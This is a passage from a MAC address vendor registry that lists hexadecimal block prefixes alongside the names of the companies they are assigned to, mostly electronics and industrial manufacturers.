Technology(Ningbo) CO, LTD 807B85B Oliotalo Oy 807B859 SMART ELECTRONICS NZ LIMITED 885D907 Schmidt & Co.,(H.K.)Ltd. 885D904 Wuhan Strong Electronics Co., Ltd 549A111 SpearX Inc. 885D90C iRoom GmbH 885D90B Premier Merchandises Limited 64FB815 Kay Schulze & Karsten Pohle GbR 64FB814 Pricer AB 80E4DA7 Shortcut Labs 1CCAE30 Private 80E4DA9 Elcus 2CD141E CITA SMART SOLUTIONS LTD 64FB81A Bronkhorst High-Tech BV 64FB818 NPG Technology S.A. 1CCAE31 PGA ELECTRONIC 64FB813 MOBILUS Inc. 9802D8E Private 2C6A6F1 ELKO EP, s.r.o. 90C6820 Shenzhen Lencotion Technology Co.,Ltd 9802D84 Zedi, Inc. A0BB3EA Filo SRL A0BB3E5 ManTech International Corporation 2C6A6F9 Logic IO Aps 2C6A6F7 SM DSP CO.,LTD. 2CD141A Fiberroad Technology Co., Ltd. 9802D88 Simplo Technology Co.,LTD 2CD1415 ZENIC INC. 0CEFAFC GainStrong Industry Co.,Ltd F802784 CLARUS Korea Co., Ltd A0BB3E1 IVision Electronics Co.,Ltd A0BB3E3 WiteRiver Technology LLC 28FD802 Zhixiang Technology Co., Ltd. 28FD80C Airbus Defence and Space Oy 0CEFAFA chengdu joyotime Technology Co., Ltd. F80278B Rosemount Analytical 2C265F2 Jiangsu JARI Technology Group Co., LTD 2C265FA Polara Engineering 0CEFAF1 Goerlitz AG A44F290 Dermalog Identification Systems GmbH 1007235 BEIJING SOOALL INFORMATION TECHNOLOGY CO.,LTD A44F29A HTD A44F29B GUANGDONG REAL-DESIGN INTELLIGENT TECHNOLOGY CO.,LTD 3C39E7C VANSTONE ELECTRONIC (BEIJING)CO,. LTD. 3C39E78 Martem AS 3C39E75 Attrackting AG 3C39E72 HomeWizard B.V. E81863B Protek Electronics Group Co.,LTD B8D8124 V5 Technology Corporation D022124 Viatron GmbH D022120 Spirit IT B.V. B8D812A Kiwigrid GmbH E4956ED Shanghai Tieda Telecommunications Equipment Co.,LTD. E4956E8 PT.MLWTelecom 74E14A9 Kanto Aircraft Instrument Co., Ltd. 74E14A7 APM Technologies (DongGuan) Ltd BC66416 Intuitive Surgical, Inc E4956E0 SMC Networks, Inc BC6641D UtilLighting Co.,Ltd. BC66411 Global China Technology Limited 58FCDB9 Hi-Target Surveying Instrument Co., Ltd. B01F81C Access Device Integrated Communications Corp. B01F817 Aether Services, Inc. F40E11A Kodpro Ltd. 58FCDB4 Inforce Computing Inc. 58FCDB0 Spang Power Electronics 141FBA7 Wisnetworks Technologies Co., Ltd. 141FBAE POS Systema LLC F40E111 BEIJING DONGJIN AERO-TECH CO., LTD BC34007 Q-PRODUCTS a. s. 7C70BC7 Nomad Digital Ltd. 7C70BC4 K-Vision Technology (Shanghai), Ltd 7C70BC0 Shanghai magcomm communication technology co ltd 141FBA4 BYZERO D076504 Private BC34003 Altronix Corporation D076508 Accumulate AB A43BFA6 Recognition Systems LLC A43BFA7 Deatronic srl 7419F85 Starcor Beijing Co.,Limited 7419F89 Princip a.s. 7419F8A Tanjarine 7419F88 Quest Payment Systems 7419F82 Symtop Instrument Co. 90F4213 Sinpeng(Guangzhou)Technology Co.,Ltd B0FF724 Jiangxi Xingchi Electronic Technology Co.,Ltd. B0FF725 Shenzhen Ruilian Electronic Technology Co.,Ltd 1C21D18 Cleaveland/Price, Inc. B0FF721 Guangzhou Senguang Communication Technology Co., Ltd BC31989 Baisstar (Shenzhen) Intelligence Co., Ltd. BC31985 Hunan Gukam Railway Equipment Co.,Ltd BC3198B Suzhou Anchi Control system.,Co.Ltd BC3198E RADAR C86BBC6 Drowsy Digital Inc BC34000 Redvision CCTV C86BBC9 Osee Technology LTD. 58C41EC PQTEL Network Technology Co. , Ltd. 58C41ED Munich Electrification GmbH 68DA73A Shenzhen Haiyingzhilian Industrial Co., Ltd. 68DA739 Nadex Machinery(Shanghai) Co.,Ltd CCD31E6 BBPOS Limited D016F0E BBPOS Limited 50482C2 BBPOS Limited 50482C9 Soter Technologies 50482CD KIDO SPORTS CO., LTD. 38B8EBB PEZY Computing K.K. 88A6EF8 TechPLEX Inc. 88A6EF6 ShenZhen KZIot Technology LLC. B44D436 Spot AI, Inc. B44D43D Shenzhen CreatLentem Technology Co.,Ltd B44D434 ALL.SPACE Networks Ltd B44D430 Mihoyo 2C279E3 Private 6C2ADF5 Xinjiang Ying Sheng Information Technology Co., Ltd. 6C2ADF1 Xi'an Xindian Equipment Engineering Center Co., Ltd 700692D Skyware Protech Limited 700692A Munters 2415108 Medicomp, Inc 2CD141F Private 54083B9 Unicompute Technology Co.,Ltd. 54083B2 NAVITUS LT 7419F8F Private E4956EF Private D016F0A OPTITERA GLOBAL NETWORKS PRIVATE LIMITED D09395E Shenzhen Hotack Technology Co.,Ltd D093954 DAESUNG CELTIC ENERSYS E03C1C1 Shikino High-Tech Co., Ltd. D016F07 Hydac Electronic D016F09 Crystal Alarm AB 549A11F Private 0055DAF Private D093950 Zhejiang Ruiyi lntelligent Technology Co. Ltd D093951 Hefei Siqiang Electronic Technology Co.,Ltd 5C6AEC4 GeneTouch Corp. 5C6AEC5 Exaterra Ltd. 5C6AEC3 Shanghai Yunsilicon Technology Co., Ltd. 7C45F92 Dongguan Boyye Industrial Co., Ltd 7C45F97 Georg Fischer Piping Systems Ltd. C0EAC30 Anhui Shengjiaruiduo Electronic Technology Co., Ltd. C0EAC35 Techem Energy Services GmbH C0EAC3D Kontron Asia Technology Inc. 7C45F98 Feller AG 8C5DB22 F+ Networks A0224E1 PoE Texas C4A5592 SHENZHEN ORFA TECH CO., LTD C4A5591 Motive Technologies, Inc. 705A6F6 Earfun Technology (HK) Limited 84B3860 Nan Jing WZX Technology Limited 84B3867 FOTILE GROUP NINGBO FOTILE KITCHENWARE Co.,Ltd 84B386C Palomar Products Inc 84B386B Sineng electric CO., Ltd E0382DE Anysafe F0221D3 ShenZhen Shizao Electronic Technology E0382DB SERCOMM PHILIPPINES INC E0382D7 Famar Fueguina S.A. D461370 Wistron Corporation D461375 Estelle AB F0221D4 Synergies Intelligent Systems Inc. F0221D6 Vcognition Technologies Inc. 4C74A78 Annapurna labs D096860 SERNET (SUZHOU) TECHNOLOGIES CORPORATION C49894C Zhejiang Rexense loT Technology Co., Ltd C49894E Hans Sasserath GmbH & Co. KG D09686A Hero Health Inc. C498943 BTL Industries JSC C498949 Shenzhen Hexin Automation Technology Co.,Ltd. C498948 Pliem (Shanghai) Intelligent Technology Co., Ltd C498942 Metasphere Ltd C483723 NextSilicon C48372E Suzhou LZY technology Co.,Ltd 5847CA1 Hexagon Metrology Services Ltd. 883CC56 mfJebsen Electronics Ltd. E86CC77 Huaqin Technology Co.,Ltd. D420008 Dalian Baishengyuan Technology Co.,Ltd D42000B Shenzhen Volt IoT technology co.,ltd. 883CC58 Wuhan Guangying Intelligence Technology Co., Ltd 883CC51 Hanwei Electronics Group Corporation 2C691D1 KATEK SE 18C3F42 Changsha Kiloview Electronics Co., Ltd. 18C3F46 VeriFone Systems (China), Inc. 303D51C TalkGo, Inc. 2C691DA Panasonic Appliances Marketing Asia Pacific 2C691D7 Shenzhen Gigalight Technology Co., Ltd FC61797 Kvaliteta Systems and Solutions Private Limited 0C7FEDD ALT Co., Ltd. 8C5109B Beijing Superhexa Century Technology Co., Ltd. 8C51090 TianJin JointOptic Technology Co., LTD. 8C51094 Shenzhen WOWOTO Technology Co., Ltd. 8C5109A SERNET (SUZHOU) TECHNOLOGIES CORPORATION 0C7FED6 Netweb Technologies India Pvt Ltd 0C7FED9 Shenzhen ORVIBO Technology Co., Ltd. 8002F43 Shenzhen Suanzi Technology Co., Ltd 7050E74 Quantumdoor Technologies, Inc. 7050E7C shenzhen newbridge communication equipment CO.,LTD 6C15249 D-HOME SMAART 6C15246 Kunshan Abram Software Technology Co.,Ltd. 6C15244 Magicyo Technology CO., LTD. 1C59745 Shenzhen Shi Fang Communication Technology Co., Ltd 6C15243 Forcite Helmet Systems Pty Ltd 1C59747 Lynxi Technologies Co.,Ltd. 1C5974D Shenzhen Geshem Technology Co Ltd 1C5974C King-On Technology Ltd. 1C59748 Topway Global Technology Limited 381F265 Zhejiang Huazhou Intelligent Equipment Co,. Ltd 1C59743 Jiangsu Welm Technology Co.,Ltd 1C59741 Logical Infrastructure PTY LTD 18A59CD Annapurna labs 381F262 Synamedia 381F26C Jade Bird Fire Co., Ltd. 18A59CE BMC Messsysteme GmbH 18A59C9 estun automation co.,ltd 18A59C0 Omwave 18A59C6 INTEGRAL PLUS 3043D7D Annapurna labs 6C9308E ANDDORO LLC 3043D75 Shenzhen Mees Hi-Tech Co., Ltd 3043D70 SYMES SA 6C9308A Shenzhen TOPWAY Technology Co.,LTD 0C86290 Shanghai Prophet Electronic Technology Co.,Ltd 988FE0D Shenzhen Vitalitim Technology Co., Ltd 6C93089 Shenzhen DOOGEE Hengtong Technology CO., LTD 1054D27 SHENZHEN CARSAFE TECHNOLOGY DEVELOPMENT CO.,LTD 1054D29 Bamboo Dynamics Corporation., Ltd. 1054D24 Raylogic Control Systems Private Limited 6C9308D Annapurna labs 0C86298 MyGregor Ltd 0C86291 Beijing Qinmu Data Technology Co., Ltd. 0C86296 C&A Marketing, INC. 1054D25 Sybersense 0826AE9 Annapurna labs 0826AE8 ShineTech Electronics Co., Ltd 0826AE5 SHENNAN CIRCUITS CO.,LTD 988FE01 GUANGZHOU HERYSTORM TECHNOLOGY CO.,LTD. 0826AEB F-Plus Mobile LLC 0826AE1 Beijing Silion Technology Corp.,Ltd. DC3643E Beijing L&S Lancom Platform Tech. Co., Ltd. DC36437 UKG 18D7938 Torsa Global 04EEE8E Best Integration Technology Co., Ltd. 04EEE80 Zoomlion Huanuo(Beijing)Technology Co.,Ltd 04EEE86 NALSSEN INC. DC36436 Shenzhen smart-core technology co.,ltd. 18D7930 Shenzhen JieXingTong Technology Co.,LTD 18D7933 Verification & Validation Technology Co.,Ltd 04EEE89 Privacy Hero DC36432 Wuhan Linptech Co. ,Ltd. 04EEE8B Hunan Yaguan Communication Technology Co.,Ltd 94C9B74 Zhejiang Hengjie Communication Technology Co,. Ltd. 50A0300 Gopod Group Limited 50A030C GUANGZHOU UNIPOWER COMPUTER CO.,LTD 50A0303 RealWear (Shanghai) Intelligent Technology Co. Ltd 50A0308 GE Medical System China Co. Ltd. 1845B3B Hangzhou CCRFID Microelectronic Co., Ltd. 1845B3D Taicang T&W Electronics 08F80DD ZHEJIANG EV-TECH.,LTD 08F80D6 SEDA CHEMICAL PRODUCTS CO., LTD. 1845B33 Ancsonic (chongqing) Electronic Science& Technology Co.,Ltd 08F80D9 Benelink Technology Inc. 1845B39 Teko Telecom Srl F4A454D SAEL SRL F4A4541 PT Telkom Indonesia F4A454E Care Bloom, LLC F4A454B Graco Inc. F4700CA Jinan Huake Electrical Device Co., Ltd. F4700CC G.S.D GROUP INC. 74F8DB3 ATX F4700C3 Union Source Technology(HK)LTD F4700C8 Shenzhen Focuscom Communication Technology Co.,Ltd. 9880BB7 Guangdong-Hong Kong-Macao Greater Bay Area Research Innovation Institute for Nanotechnology 7872643 Guangdong Hongqin Telecom Technology Co.,Ltd. 9880BB9 Shenzhen Hebang Electronic Co., Ltd 7872642 BZBGEAR 7872640 SmartMore Co.,ltd. 1CAE3E3 HagerEnergy GmbH 1CAE3EC QuEST Rail LLC 7C8334E Balter GmbH 7C83344 Fusus 7C83346 Wojinxin Beijing Technology Co., LTD 986EE88 Sisgeo Srl 9880BBB Hilo 38A8CD7 Shenzhen C & D Electronics Co., Ltd. 38A8CD2 Beijing Porient Technology Co., Ltd 38A8CDB Qingdao Hisense Hitachi Air-conditioning Systems Co.,Ltd. 785EE89 TOPDON TECHNOLOGY Co.,Ltd. 7C83341 Linear Logic LLC 7C83342 PEMtronics LLC 38A8CDC Beijing Aumiwalker technology CO.,LTD 38A8CD8 Max Way Electronics Co., Ltd. 38A8CD6 cal4care Pte Ltd 785EE81 RIKEN KEIKI NARA MFG. Co., Ltd. 38A8CD0 ACiiST Smart Networks Ltd. 6433B50 Duomondi International Development Co., Ltd. 2836139 Qingdao Airpoint Electronics Co.,Ltd. 6433B5E University of Texas at Austin 2836134 Elytone Electronic Co., Ltd. 5848497 Shandong Aotai Electric Co., LTD. 5848496 Shenzhen hongqifu Technology Co., Ltd 584849B Daatrics LTD F02A2B9 ZiGong Pengcheng Technology Co.,Ltd A85B36A TAIDEN INDUSTRIAL CO.,LTD A85B364 Luoxian (Guandong) Technology Co., Ltd F02A2B7 Protronix s.r.o. F02A2B1 Tobi Tribe Inc. A85B369 Avista Edge D09FD94 Poten (Shanghai) Technology Co.,Ltd. D09FD9C Fujian Newland Auto-ID Tech. Co,.Ltd. D09FD98 Queclink Wireless Solutions Co., Ltd. D09FD97 Raymax Technology Ltd. 1874E28 Kano Computing Limited D09FD90 Lemei Intelligent IOT (Shenzhen) Co., Ltd 88C9B31 Cervoz Technology Co; Ltd. 88C9B32 shenzhen franklin ESS technology CO.,Ltd D09FD9D Shenzhen eloT Technology Co.,Ltd C0FBF9E Navitas Digital Safety Ltd C8F5D65 Pinmicro K K C8F5D67 Oscars Pro C0FBF9A Tiandi(Changzhou) Automation Co., Ltd. 1CA0EF0 Tangshan Liulin Automation Equipment Co., Ltd. 1CA0EFC LLC "Gagar.In" 1CA0EF8 Zillnk 20CE2A1 Shanghai Digicube Info&Tech Co.,Ltd. 2CD141D Square Inc. 20CE2A8 Intelligraphics 0C5CB5C Hunan Newman Car NetworKing Technology Co.,Ltd 0C5CB56 S2C limited 1CA0EF4 Leviathan Solutions Ltd. F023B9D Shenyang Ali Technology Company Limited 245DFC9 TORGOVYY DOM TEHNOLOGIY LLC 245DFC0 CompanyDeep 245DFC6 Guangzhou Lango Electronics Technology Co.,Ltd. 245DFC5 ContactProximity Inc 38B8EB7 Sirin Mobile Technologies E86CC7A CoxSpace 0411192 Alethea Communications Technologies Pvt. Ltd. 982782A Nanjing BianYu Future Home Technology Co.Ltd 9827829 Wuxi GuoYiHaiJu Technology Co.,Ltd. 9827828 CATS Power design 0411191 Acentury 78D4F18 Xiamen Cheerzing IOT Technology Co.,Ltd. 446FD8A ZHEJIANG HIKAILINK TECHNOLOGY Co., Ltd 446FD83 Shenzhen Mestechs Technology CO., LTD 9827825 Guangzhou Wuzhou Technology Co, Ltd. 78D4F1D Quidel Corporation A0024A9 Kontakt Micro-Location Sp z o.o. A0024AB Xi'an Yingsheng Electric Technology Co.,Ltd. A0024A2 Danriver Technologies Corp. 3C39E71 BEWATEC Kommunikationstechnik GmbH A0024A4 Argos Solutions AS A453EE0 MAHLE ELECTRONICS, SLU 8CAE491 H3 Platform 34049E9 Church & Dwight Co., Inc. 8C476EA AU Optronics Corporation 8C476E8 IntelliVIX Co. Ltd. F0D7AFD Dongguan Gedi Electrons Techeology Co.,LTD A453EED SSK CORPORATION DC4A9E9 AiSight GmbH 6879129 LEAPS s.r.o. 687912C Globus Infocom Limited 6879127 Babbit and Friends, SIA 687912E Ametek Solidstate Controls 8411C28 Leybold GmbH DC4A9E5 Nuove Tecnologie srl DC4A9E3 LEACH INTERNATIONAL EUROPE DC4A9EA LongSung Technology (Shanghai) Co.,Ltd. FCCD2F2 Loupedeck Oy FCCD2F9 Aroma Retail 5895D82 Sercomm Corporation. 58208A4 TRING 58208A9 Suzhou Ruilisi Technology Ltd. 58208A1 BEIJING SENFETECH CORPORATION LTD. 58208AC Jiangsu Zhonganzhixin Communication Technology Co. 58208A6 Shangyin Intelligence Technology Shandong Co.,Ltd 58208A0 Annapurna labs CC4F5C5 Kymati GmbH 58208AE UPM Technology, Inc 98FC842 Juketek Co., Ltd. C0619AA Gronn Kontakt AS C0619A8 Nanjing SinoVatio Technology Co., Ltd C0619A9 Wingtech Mobile Communications Co.,Ltd. 18FDCBA Sercomm Corporation. 18FDCB8 CISTECH Solutions 98FC84A Shield Inc. 18FDCB1 SOTHIS CIC TEC (Shanghai) Co., Ltd 4C93A60 Vestaboard, Inc. 28B77C7 Convertertec Deutschland GmbH 28B77C4 Annapurna labs 4C93A66 Shandong Senter Electronic Co., Ltd 28B77C2 Zhuhai RongBang Electronic Technology Co., Ltd. 4C93A6E CELLTRON 4C93A68 Sercomm Corporation. 4C93A67 5Voxel Co., Ltd. F469D59 Terminus (Shanghai) Technology Co.,Ltd. 5C857E2 mobilogix HongKong 304950B HANGZHOU EV-TECH CO.,LTD 5C857EC Annapurna labs 3049506 Curb, Inc. F0D7AF1 Beijing Serviatech lnformation Tech Co.,Ltd F041C8C Shanghai Think-Force Electronic Technology Co. Ltd 3049509 Shanghai gatang technology CO.,LTD F0D7AFE Wren Associates, LTD F0D7AF0 ID Tech Japan Co.,Ltd. 38F7CD1 NZIA Connect Inc 7069793 Hebei Baina Xinda Technology Co., Ltd. CCC2617 Ability Enterprise Co., Ltd CCC2614 EDAG Engineering GmbH 94FBA7C Solaborate Inc. 94FBA77 Anvil Systems Group, Inc. 7069792 Graphcore Ltd 38F7CDA Distech Controls C09BF4E Continental Automotive Component Malaysia Sdn.Bhd. C09BF47 Big Dutchman International GmbH E8B470C Anduril Industries 94FBA76 Sercomm Corporation. 94FBA7B Shenzhen Golden Star Technology Ltd 94FBA75 CAVITY EYE 94FBA73 GUANG DONG TAKSTAR ELECTRONIC CO.,LTD. E8B4703 Webfleet Solutions B.V. E8B470D Medica Corporation C09BF49 Alcatraz AI Inc. F490CB6 Airbeam Wireless Technologies Inc. C09BF40 Annapurna labs F490CBE RSAE Labs Inc 9405BB5 Chengdu Zhongheng Network Co.,Ltd. 94CC04C Shanxi Baixin Information Technology Co., Ltd. 9405BBA SolarEdge Technologies 9405BB6 ZIGPOS GmbH 14AE859 Veo Technologies 14AE857 SHENZHEN HONOR ELECTRONIC CO.,LTD 94CC045 SHENZHEN SANRAY TECHNOLOGY CO.,LTD 94CC041 GOCOAX, INC 94CC043 Shenzhen Link technology Co.,Ltd 90E2FCB Shenzhen Dingsheng Intelligent Technology Co., Ltd 90E2FC9 Huddly AS 3CFAD3C Shenzhen zhong ju Fiber optical Co.Ltd 3CFAD32 Naruida Technology Ltd. 50DE190 Telic AG 50DE19C Shenzhen Vipstech Co., Ltd 402C76A NowTechnologies Zrt 402C765 Baumer Bourdon-Haenni 402C762 Annapurna labs A0224EA IST ElektronikgesmbH 200A0D7 Tecnint HTE SRL 006967E Tianjin Lianwu Technology Co., Ltd. 006967B Datapan d.o.o. 0069679 Hangzhou Wise IOT Technology Co.,Ltd 0069678 Ambient-System sp. z o.o. 200A0DA IRSAP 6431393 KOANGYOW INTEGRATION MACHINE CO., LTD. 6431399 Honeywell Analytics Ltd 5062555 Suzhou Ruixinjie Information Technology Co.,Ltd 5062553 Hypertech Advance Co., LTD 6431396 Hunan Voc Acoustics Technology Co., Ltd. 506255C AED Distribution C4954D3 Sercomm Corporation. C4954DC SolidGear Corporation 643139C SHEN ZHEN FUCHANG TECHNOLOGY Co.,Ltd. 244E7BD Church & Dwight Co., Inc. 04D16E7 Envision Energy 5062557 AVTECH Software, Inc. 04D16E4 ShenZhen Huafu Information technology Co.?Ltd 04D16EC PacPort Corporation 440377B Hangzhou Asia Infrastructure Tech. Co., Ltd. 04D16E1 Launch Tech Co., Ltd. 4403777 Stara S/A Indústria de Implementos Agrícolas 4011758 Beijing Gemotech Intelligent Technology Co., Ltd. 04D16E8 CHENGDU INTERLINK SCIENCE AND TECHNOLOGY CO.,LTD 4011759 ADH Guardian USA 241510E Satellite Link Technology CO.,LTD 4C4BF9C Connected IO 4C4BF98 Zivid AS 241510C Shenzhen Xtooltech Co., Ltd 208593E Dynaudio 2085930 Hemina Spa 208593C Regloplas AG 4C4BF95 Remedee Labs 8439BE2 Cheng Du virtual world Technology Limited. 4C4BF91 Jiangsu acrel Co., Ltd. 4C4BF97 GLONEXS 2085934 Kloudspot Inc 2085931 Networking Services Corp 4011752 Kanda Kogyo 4C4BF9E Beijing AutoAi Technology co. LTD 4C4BF94 Shenzhen dingsheng technology co., LTD D05F649 Shanghai Luying International Trade Co.,Ltd D05F645 Atoll Solutions Private Limited D05F64B North American Blue Tiger Company, LLC 44D5F21 SIMPLERED TECHNOLOGY LTD. 44D5F28 CETC Avionics.L td 44D5F23 VURO LLC 9806373 Hangzhou Sanxin Network Technology Co.,Ltd 9806377 SAMWONTECH 980637C HwaCom Systems Inc. 241510A Unitronux(Shenzhen) Intelligence Technology Co.,Ltd 980637B Petersime 980637D VR Technology(Shenzhen) Limited 2415100 Safetrust Inc 2415101 SMaBiT GmbH 44D5F24 APPOTRONICS CO., LTD 44D5F20 TIBA Research & Development (1986) LTD 9806379 NAB co,.LTD D05F642 SHANGHAI ZHONGMI COMMUNICATION TECHNOLOGY CO.,LTD D05F643 HUAQIN TELECOM HONG KONG LTD B4A2EB7 Kona I B4A2EB0 QKM Technology(Dongguan)Co.,Ltd FCA47AB Shenzhen Nokelock Technology Co, Ltd. FCA47A6 Token FCA47A0 Broadcom Inc. 2C16BD4 Sunit Oy 8C593CE Shenzhen Tian-Power Technology Co.,Ltd. D0C857D IFLYTEK CO.,LTD. 8C593CB Scharfe-Sicht GmbH 8C593CA ecom instruments GmbH D0C8573 Mobicon D0C8577 Eco Mobile 1C82596 CGI IT UK LIMITED 6095CEC Synamedia 6095CE4 Untangle, Inc. 1C8259A ESTec Corporation B0FD0BE Shenzhen FEIBIT Electronic Technology Co.,LTD B0FD0B1 IDspire Corporation Ltd. 848BCD0 SouXin Corporate C82C2B8 Verifone Systems (China),lnc. C82C2BE Fränkische Rohrwerke Gebr. Kirchner GmbH & Co. KG C82C2B2 Repp Health C82C2BC Smart Wires Inc E41E0A3 Avast Software s.r.o. E41E0AA FireAngel Safety Technology Ltd C86314E Taylor Dynamometer C86314C Freeus LLC FCD2B6C Silicon (Shenzhen) Electronic Technology Co.,Ltd. FCD2B6A NREAL TECHNOLOGY LIMITED 34E1D16 Ningbo Hua Gao Mdt Info Tech Ltd 34E1D13 Rinco Ultrasonics AG 34E1D19 Biamp 34E1D17 Genius Pros 34E1D14 ASA Innovation & Technology Ltd. FCD2B6E Univer S.p.A. C863140 Western Reserve Controls, Inc. C863145 Meyer Electronics Limited E44CC75 CE LABS, LLC 745BC59 Haikou Frun Flash&Mcu Microcontrol Technology Development Co.,Ltd 745BC5B Smartiply Inc. 745BC53 OXON AG E05A9FB Shenzhen Rongan Networks Technology Co.,Ltd E05A9F3 Link of Things Co., Ltd. D8860B6 SCANMATIK D8860B9 DIGITAL CONCEPTS 4CBC982 Quake Global Inc E44CC76 HANGZHOU OLE-SYSTEMS CO., LTD E44CC77 Channel Enterprises (HK) Ltd. E05A9F4 Hale Products 4CBC985 Gronic Systems GmbH 4CBC98B Dongguan SmartAction Technology Co.,Ltd 4CBC983 Machine Max 38B19E6 Thrust Networks D8860BA GLO Science 8439BE0 HINO ENGINEERING, INC 38B19E3 AVO DEVELOPMENT LTD 38B19ED Dallas Delta Corporation D8860B4 Teplovodokhran Ltd. CCD39D7 Glenair D425CC0 NORDI TELEKOMMUNIKATSIOONI OÜ D425CC3 EISST Ltd 9C69B49 Teptron AB D425CCA E-MetroTel D425CC1 Eware Information Technology com.,Ltd CCD39D3 MagTarget LLC D425CCE Coperion 9C69B48 Skydock do Brasil Ltda 9C69B47 PCI Limited 6CDFFB6 AAON 6CDFFBB CELL System Co.,Ltd. 4C917A8 Camsat Przemysław Gralak 4C917A9 Hangzhou Hangtu Technology Co.,Ltd. 6CDFFB9 YongTechs Electric Co. Ltd 6CDFFB8 Hardmeier 4C917A4 LumiGrow Inc. 7CBC847 Xuji Changnan Communication Equipment Co., Ltd. 7CBC84A OPNT BV 7CBC846 Société de Transport de Montréal 98F9C77 ARIMA Communications Corp. 0CFE5D3 Beijing WayClouds Technology Co., Ltd. 7CBC841 Xiamen Mage Information Technology Co.,Ltd. 98F9C7A MSB Elektronik und Gerätebau GmbH 6C5C3DB Reconova Technologies 6C5C3DD Syowatsusinkougyo Co.,Ltd. 6C5C3DA krtkl inc. 6C5C3DC choyang powertech 6C5C3D7 SOUNDKING ELECTRONICS&SOUND CO., LTD. 1CFD086 A&B Technology A83FA1B Exel s.r.l. unipersonale A83FA13 Guangzhou Tupu Internet Technology Co., Ltd. 3C6A2C5 Qingdao iGuan Technology Co., Ltd. 3C6A2C2 Bosch Automotive Products (Suzhou) Co., Ltd. 3C6A2CB Phytium Technology Co., Ltd. 1CFD085 Beijing Hengxin Rainbow Information Technology Co.,Ltd A83FA1D Shenzhen BIO I/E Co.,Ltd A83FA14 Zhejiang Wellsun Intelligent Technology Co.,Ltd. A4ED43E TOEC TECHNOLOGY CO.,LTD. A4ED433 Dongguan Mingji Electronics technology Group Co., Ltd. A4ED43C leakSMART 300A607 Newtons4th Ltd A4ED431 INGELABS S.L. 8489EC7 BYDA Co. Ltd., 8489ECC SHINKAWA LTD. A02833C Kalray S.A. 9CF6DD4 Capital Engineering & Research Incorporation Ltd. C083596 Beijing Cloud Fly Technology Development Co.Ltd 9CF6DD7 KXT Technology Co., Ltd. 3009F94 Punkt Tronics AG C08359D Gardner Denver Thomas GmbH 9CF6DDA AVI Pty Ltd 04C3E6D Amiosec Ltd 04C3E64 Innovusion Inc. B44BD61 SHENZHEN TITA INTERACTIVE TECHNOLOGY CO.,LTD 3C427EA snap40 Ltd 3C427ED ROBOX SMART MOTION (WUHU) CO.,LTD 04C3E68 SLOC GmbH D47C448 Beijing Maystar Information Technology Co., Ltd. A019B22 Beijing Deephi Intelligent Technology Co., Ltd 2C48355 Scout Security, Inc. D47C445 LS Communication Co.,Ltd. A019B28 MIS Industrie Systeme GmbH & Co. KG A019B2E Ahgora Sistemas SA D47C446 ASDA ICT Co., Ltd. 2C48350 Progress Rail Services, Inspection and Information Systems 2C48351 Advanced Electronics Company Ltd 2C48353 Newtrax Technologies Inc 0C73EBD D-Link (Shanghai)Limited Corp. 0C73EBB Synaccess Networks 0C73EB2 Deltapath, Inc. 0C73EBA Dana 0C73EBE Taiwan Pulse Motion Co., Ltd. 0C73EB3 Tiinlab Acoustic Technology (Shenzhen) Co., Ltd. 8C1CDA7 K Technology Corporation 3C24F08 Sivat Technology Co.,Ltd. 3C24F09 Siemens AG - Siemens Deutschland Mobility 8C1CDA0 CEOS Pty Ltd 3C24F06 Inter Action Corporation 3C24F0B COMATIS 8C1CDA5 Septentrio NV 8C1CDAD Riegl Laser Measurement Systems GmbH 0C73EB7 Dinkle Enterprise Co., Ltd. 480BB26 Annapurna labs 885FE83 Sonnet Labs Inc. 885FE85 Hauch & Bach ApS 4865EE8 SmartDisplayer Technology Co., Ltd. 480BB2B Popit Oy 885FE89 Sowee 885FE87 Red Technologies, LLC. F041C8E Shenzhen Umind Technology Co., Ltd. F041C82 Shenzhen Medica Technology Development Co., Ltd. 40A36B4 SKS-Kinkel Elektronik GmbH 301F9A3 MICOMSOFT CO.,LTD. 301F9AA HUNAN CHANGSHA HENGJIAN TECHNOLDGY DEVELPMENT CO.,LTD. A4DA228 SolidPro Technology Corporation C4FFBCB KAGA ELECTRONICS CO.,LTD. DCE5333 ShenZhen C&D Electronics CO.Ltd. DCE5337 SAN Engineering 88A9A76 Sieper Lüdenscheid GmbH & Co. KG 282C022 Shenzhen emb-star technology co. LTD 9C431E4 Wireless Environment, LLC 9C431E1 Symfun Telecom Ltd 9C431E7 Optris GmbH 4048FD6 Swarco Technology ApS F8B568B Whizpace Pte. Ltd. F8B5688 Maven Wireless AB 4048FD7 Cloud4Wi 4048FDC Ecotap B.V. 3873EA4 Light Blue Optics Ltd. EC9F0DB CRRC QINGDAO SIFANG ROLLING STOCK RESEARCH INSTITUTE CO.,LTD 4048FD2 MITHRAS Technology Co., LTD 3873EA5 ISTCONTROL EC9F0DA flexlog GmbH AC1DDF8 Sichuan Odot Automation System Co.,Ltd. AC1DDF9 Solare Datensysteme GmbH 34D0B89 Skytech Creations Limited AC1DDF2 ConectaIP Tecnologia S.L. 34D0B8D NTX Embedded 34D0B8C Glory Mark Electronic Ltd. Taiwan Branch (B.V.I.) 34D0B84 EQPlay Intelligent Technology(Kunshan) Co,Ltd. 741AE07 BÄR Bahnsicherung AG CC2237E MANUFACTURAS Y TRANSFORMADOS AB, S.L. 741AE0E ITS Partner (O.B.S) S.L. CC2237D SHENZHEN HOOENERGY TECHNOLOGY CO.,LTD 04714B2 Shenzhen WayOS Technology Crop., Ltd. 741AE08 Broadcast Wireless Systems Ltd CC2237B Tolomatic, Inc. CC22372 Apeiron Data Systems 2C279E9 octoScope, Inc. 2C279E8 Institut Dr. Foerster GmbH & Co. KG 2C279EE Amaryllo International Inc. 189BA58 Shenzhen Tong Tai Yi information Technology Co.,Ltd 8439BE3 ShenZhen Fudeyu Technology co.,Ltd 189BA53 PHINETWORKS 34298FA Virtual Trunk Pte Ltd 34298F3 Beijing Vorx Telecommunications Co., Ltd. 34298F1 Chengdu Meross Technology Co., Ltd. 904E91D SKODA ELECTRIC a.s. 904E914 Wrtnode technology Inc. 189BA59 APANA Inc. 34298FB Schnick-Schnack-Systems GmbH 34298F8 Nanjing Sandemarine Electric Co.,Ltd 2C279E4 Shijiazhuang King Transportation Equipment Co.,Ltd 34298F6 Bellman & Symfon 34008AE SHENZHEN WXL ELECTRONICS CO., LTD. 34008AB Project Engineering srl 34008A0 Angee Technologies Ltd. 78D8008 Salunda Ltd 78D8001 Shenzhen Envicool Information Technology Co., Ltd 78D8003 Shenzhen Scodeno Technology Co,. Ltd. 7CBACCC Flying Loft Inc. 78D800C Shenzhen Chenzhuo Technology Co., Ltd. F88A3CE Avateq Corp. 7CBACCE ALPHA TECHNOLOGIES, LLC 4C65A8E High Infinity Germany 4C65A86 Nuviz Oy 